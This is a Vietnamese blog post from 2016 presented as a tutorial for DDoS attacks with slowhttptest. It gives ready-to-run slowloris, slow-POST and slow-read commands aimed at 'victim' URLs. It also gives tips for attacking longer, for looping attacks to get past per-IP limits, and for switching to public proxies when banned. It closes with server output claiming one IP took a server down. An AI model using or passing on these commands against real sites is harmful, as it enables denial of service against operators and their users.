Thứ Sáu, 25 tháng 3, 2016

Hướng dẫn ddos với kĩ thuật slowhttptest trong kali linux : slowloris, slow HTTP POST và slow Read


SlowHTTPTest là một công cụ cấu hình nâng cao, mô phỏng một cuộc tấn công từ chối dịch vụ. Nó hoạt động trên hầu hết các nền tảng Linux, OSX và Cygwin và một môi trường giống Unix, giao diện command-line cho Microsoft Windows.

Nó thực hiện các cuộc tấn công tại tầng ứng dụng và tấn công vào băng thông thấp phổ biến như các cuộc tấn công slowloris, Slow HTTP POST, Slow Read (dựa trên giao thức TCP với thời gian khai thác kéo dài), cũng như tấn công Apache Range Header bằng cách gây quá tải bộ nhớ và CPU trên máy chủ.

Slowloris và Slow HTTP POST DoS tấn công dựa trên các giao thức HTTP vốn thiết kế đòi hỏi các request phải hoàn toàn được nhận bởi máy chủ trước khi được thực thi. Nếu một request HTTP không đầy đủ hoặc nếu tốc độ truyền tải thấp, máy chủ phải giữ nguồn tài nguyên đó ở chế độ busy và chờ đợi phần còn lại của dữ liệu. Nếu máy chủ giữ quá nhiều tài nguyền busy sẽ gây ra từ chối dịch vụ và không thể đáp ứng các yêu cầu khác. Công cụ này gửi các request HTTP không đầy đủ và cố gắng thực hiện một cuộc tấn công từ chối dịch vụ để kiểm tra khả năng chịu tải của máy chủ HTTP.

1, Cài đặt Slowhttptest

*Kali Linux:
apt-get install slowhttptest

*Với những bản Linux khác:
Download tại đây
$ tar -xzvf slowhttptest-x.x.tar.gz
$ cd slowhttptest-x.x
$ ./configure --prefix=PREFIX
$ make
$ sudo make install
PREFIX là nơi bạn cài đặt

*Với MAC OSX:
Sử dụng Homebrew
brew update && brew install slowhttptest

2, Sử dụng slowhttptest

a, Tấn công slow message body

slowhttptest -c 1000 -B -i 110 -r 200 -s 8192 -t FAKEVERB -u https://victim/loginform.html -x 10 -p 3

Với đồ thị

slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u https://victim/loginform.html -x 10 -p 3

b, Tấn công slowloris

slowhttptest -c 1000 -H -i 10 -r 200 -t GET -u https://victim/index.html -x 24 -p 3

Với đồ thị

slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -t GET -u https://victim/index.html -x 24 -p 3

c, Tấn công slow read mode với proxy

slowhttptest -c 1000 -X -r 1000 -w 10 -y 20 -n 5 -z 32 -u http://someserver/somebigresource -p 5 -l 350 -e x.x.x.x:8080

Mặc định các cách thức tấn công đều giới hạn 240 giây, để có thể tấn công nhiều hơn bạn sử dụng với tùy chọn -l

-l 10000

Ở trên là tùy chọn sẽ tấn công với 10000 giây

Để tấn công lặp đi lặp lại, đối với những website hạn chế htaccess theo mỗi IP, ta có thể dùng vòng lặp như sau

while true; do "câu lệnh tấn công"; sleep 30; done

Để sử dụng proxy bạn có thể lấy ở site https://incloak.com/proxy-list/

3, Xuất ra thống kê

Với tùy chọn -g bạn sẽ nhận được 2 file CSV và HTML để xem thống kê

Bảng thống kê biểu đồ tấn công

Những dòng thông báo khi bạn sử dụng slowhttptest

“Hit test time limit”Hết thời gian với tùy chọn -l
"No open connections left"Tất cả kết nối được ngắt
“Cannot establish connection”Không có kết nối nào được thiết lập trong N giây đầu tiên của việc tấn công, trong đó N là một trong hai giá trị của các đối số -i, hoặc 10, nếu không được thiết lập. Điều này sẽ xảy ra nếu không tấn công được đến host hoặc việc remote peer bị gián đoạn
“Connection refused”Việc kết nối peer không được chấp nhận (Có thể IP của bạn bị cấm, hãy thử sử dụng proxy xem sao)
“Cancelled by user”bạn nhấn Ctrl-C hoặc gửi SIGINT trong một số cách khác
“Unexpected error”Lỗi không xác định

Tôi thử tấn công localhost để thử nghiệm xem thông tin gì xuất hiện bên phía máy chủ của nạn nhân

slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://www.localhost.com -x 10 -p 3


Đây là thông báo từ server của nạn nhân

rootuser@localhost [/home]# pgrep httpd | wc -l
151

Tôi cũng thử truy cập vào /var/log/messages để xem

rootuser@someserver [/var/log]# tail -100 message | grep Firewall

Sep 23 11:43:39 someserver: IP 1.2.3.4 (XX/Anonymous/1-2-3-4) found to have 504 connections

Như bạn đã thấy, chỉ với 504 kết nối trong 85 giây từ 1 địa chỉ IP đã đủ kết thúc một server !

Nguồn: MysTown
*Copy vui lòng để lại nguồn

Không có nhận xét nào:

Đăng nhận xét